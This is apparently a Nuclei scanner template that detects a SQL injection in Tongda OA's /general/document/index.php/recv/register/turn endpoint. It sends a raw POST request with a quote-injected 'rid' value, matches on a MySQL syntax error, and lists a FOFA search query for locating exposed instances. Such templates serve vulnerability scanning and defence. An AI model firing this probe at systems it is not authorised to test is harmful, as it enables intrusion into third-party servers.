http:
    - matchers:
        - dsl:
            - contains((body_1), 'You have an error in your SQL syntax')
          type: dsl
      raw:
        - |
          POST /general/document/index.php/recv/register/turn HTTP/1.1
          User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          _SERVER=&rid=1'
id: tongda-oa-register-turn-sqli
info:
    author: pphua
    metadata:
        fofa-query: title="office Anywhere" && icon_hash="-759108386" && "2013"
        max-request: 1
        veified: true
    name: 通达OA register/turn SQL注入
    severity: high
    tags:
        - tongda
        - 通达oa
